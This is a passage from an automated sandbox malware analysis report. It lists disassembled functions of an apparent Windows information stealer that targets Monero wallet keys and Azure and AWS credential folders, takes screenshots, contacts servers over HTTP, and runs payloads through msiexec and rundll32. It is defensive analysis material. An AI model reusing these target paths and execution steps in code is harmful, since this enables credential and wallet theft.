                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0118E130,00000000,?,0118CF58,00000000,?,004D1A1C), ref: 004B5E71
                              • lstrlen.KERNEL32(00000000), ref: 004B5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004B5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B5E9A
                              • lstrlen.KERNEL32(00000000), ref: 004B5EAF
                              • lstrlen.KERNEL32(00000000), ref: 004B5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004B5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 004B5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004B5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004B5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FBD
                              • HttpOpenRequestA.WININET(00000000,0118E1D0,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B5BF8
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: bc23d0f25fed1d36fdcdf6bfe2233dd11631e700c52dcece8a7dcd33df3f3b68
                              • Instruction ID: edf0e51cb193f6c12c0a46a424085579a5c770030724131644cde95056e51393
                              • Opcode Fuzzy Hash: bc23d0f25fed1d36fdcdf6bfe2233dd11631e700c52dcece8a7dcd33df3f3b68
                              • Instruction Fuzzy Hash: 1A121E7582011CABCB54FBA1DC96FEEB378BF14708F5001AEB10662091DF782E59CB69
                              Function 004BCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004BD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004BD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD208
                              • lstrcat.KERNEL32(?,004D1478), ref: 004BD217
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD22A
                              • lstrcat.KERNEL32(?,004D147C), ref: 004BD239
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD24C
                              • lstrcat.KERNEL32(?,004D1480), ref: 004BD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD26E
                              • lstrcat.KERNEL32(?,004D1484), ref: 004BD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD290
                              • lstrcat.KERNEL32(?,004D1488), ref: 004BD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD2B2
                              • lstrcat.KERNEL32(?,004D148C), ref: 004BD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD2D4
                              • lstrcat.KERNEL32(?,004D1490), ref: 004BD2E3
                                • Part of subcall function 004CA820: lstrlen.KERNEL32(004B4F05,?,?,004B4F05,004D0DDE), ref: 004CA82B
                                • Part of subcall function 004CA820: lstrcpy.KERNEL32(004D0DDE,00000000), ref: 004CA885
                              • lstrlen.KERNEL32(?), ref: 004BD32A
                              • lstrlen.KERNEL32(?), ref: 004BD339
                                • Part of subcall function 004CAA70: StrCmpCA.SHLWAPI(011889C8,004BA7A7,?,004BA7A7,011889C8), ref: 004CAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 004BD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 94219fea91ad6dc0f50586693aa0e03c1019733d13101b4c60fd6c658cf56cc0
                              • Instruction ID: 3d89b0d5a5563523ac76c1ea027694c93f070c47a1e870002406806b8758f27e
                              • Opcode Fuzzy Hash: 94219fea91ad6dc0f50586693aa0e03c1019733d13101b4c60fd6c658cf56cc0
                              • Instruction Fuzzy Hash: CBE16FB5900108ABCB44FBA1DD96FEE7379BF14308F10415EF106A6091DE39AE15CB7A
                              Function 004BC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0118C678,00000000,?,004D144C,00000000,?,?), ref: 004BCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004BCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004BCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004BCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004BCAD9
                              • StrStrA.SHLWAPI(?,0118C6A8,004D0B52), ref: 004BCAF7
                              • StrStrA.SHLWAPI(00000000,0118C6F0), ref: 004BCB1E
                              • StrStrA.SHLWAPI(?,0118D0C0,00000000,?,004D1458,00000000,?,00000000,00000000,?,01188AD8,00000000,?,004D1454,00000000,?), ref: 004BCCA2
                              • StrStrA.SHLWAPI(00000000,0118D080), ref: 004BCCB9
                                • Part of subcall function 004BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004BC871
                                • Part of subcall function 004BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004BC87C
                              • StrStrA.SHLWAPI(?,0118D080,00000000,?,004D145C,00000000,?,00000000,01188A68), ref: 004BCD5A
                              • StrStrA.SHLWAPI(00000000,01188928), ref: 004BCD71
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B46), ref: 004BC943
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B47), ref: 004BC957
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B4E), ref: 004BC978
                              • lstrlen.KERNEL32(00000000), ref: 004BCE44
                              • CloseHandle.KERNEL32(00000000), ref: 004BCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: d3f19a5f0eaedc8f1a96481e6ef07d92e930e86494d2fa419077e23a565e53a1
                              • Instruction ID: 06764b274944f281b3557f9bf6177562dde084d4ffda7741d91c2a8c2fb68661
                              • Opcode Fuzzy Hash: d3f19a5f0eaedc8f1a96481e6ef07d92e930e86494d2fa419077e23a565e53a1
                              • Instruction Fuzzy Hash: 21E11EB580010CABDB54FBA1DC96FEEB779AF14308F00416EF10666191DF386A5ACB79
                              Function 004C8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0118A480,00000000,00020019,00000000,004D05B6), ref: 004C83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004C8426
                              • wsprintfA.USER32 ref: 004C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8499
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 1d1e7278f4e4bb5d4078ce02c9231ab914da44614f115edcc30d49cba1dbc78f
                              • Instruction ID: ba4f851aaef4e10426699d478aa2cf2717d47d24bab009183e5d84081d555275
                              • Opcode Fuzzy Hash: 1d1e7278f4e4bb5d4078ce02c9231ab914da44614f115edcc30d49cba1dbc78f
                              • Instruction Fuzzy Hash: A6811CB591011CABDB64EB50CC95FEAB7B9BF08704F00829EE109A6140DF756F85CFA9
                              Function 004C4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 004C4DCD
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C492C
                                • Part of subcall function 004C4910: FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 004C4E59
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                                • Part of subcall function 004C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                                • Part of subcall function 004C4910: FindClose.KERNEL32(000000FF), ref: 004C4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004C4EE5
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C49B0
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D08D2), ref: 004C49C5
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C49E2
                                • Part of subcall function 004C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 004C4A1E
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,0118E200), ref: 004C4A4A
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,004D0FF8), ref: 004C4A5C
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,?), ref: 004C4A70
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,004D0FFC), ref: 004C4A82
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,?), ref: 004C4A96
                                • Part of subcall function 004C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 004C4AAC
                                • Part of subcall function 004C4910: DeleteFileA.KERNEL32(?), ref: 004C4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 45a37f2976407bdbe119e1bcd4e40ba3d62cfcb1ca8e386aa23c0f6f03aec42a
                              • Instruction ID: 60ebc0d9ea36362b4e1153fea6aa0a88a25b3c2128bc25bf30b0596f67ee6d7a
                              • Opcode Fuzzy Hash: 45a37f2976407bdbe119e1bcd4e40ba3d62cfcb1ca8e386aa23c0f6f03aec42a
                              • Instruction Fuzzy Hash: 3441A5BAA4020867CB50F770DC57FED3338AB64704F40445EB549A61C1EDB85BC9CBA6
                              Function 004C9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004C906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 3479b8d846b803ef33986b1032d874ee08433b1b37f242366c2bb905e666c03e
                              • Instruction ID: c8c2aea1bfca50916eda1198c0e2e0c7daae958cb8eb119da455e78cde3af2be
                              • Opcode Fuzzy Hash: 3479b8d846b803ef33986b1032d874ee08433b1b37f242366c2bb905e666c03e
                              • Instruction Fuzzy Hash: 297121B5900208ABDB04EFE4DC99FEEB7B9BF48700F10850DF519A7290DB78A905CB65
                              Function 004C2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 6ae163a2eb63dc6de8eda7f9290547a103be14387be53d5e16af3b419ebd918d
                              • Instruction ID: 2946ab36106aef8bf8295f24c86acbb23e93b75a204d5d16e120adab7d9853ee
                              • Opcode Fuzzy Hash: 6ae163a2eb63dc6de8eda7f9290547a103be14387be53d5e16af3b419ebd918d
                              • Instruction Fuzzy Hash: DB12207980010C9BDB54FBA1DC92FEDB738AF14308F50416EE10666191EF782B5ACF6A
                              Function 004C52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B6280: InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                                • Part of subcall function 004B6280: StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                                • Part of subcall function 004B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                                • Part of subcall function 004B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                                • Part of subcall function 004B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                                • Part of subcall function 004B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5318
                              • lstrlen.KERNEL32(00000000), ref: 004C532F
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004C5364
                              • lstrlen.KERNEL32(00000000), ref: 004C5383
                              • lstrlen.KERNEL32(00000000), ref: 004C53AE
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
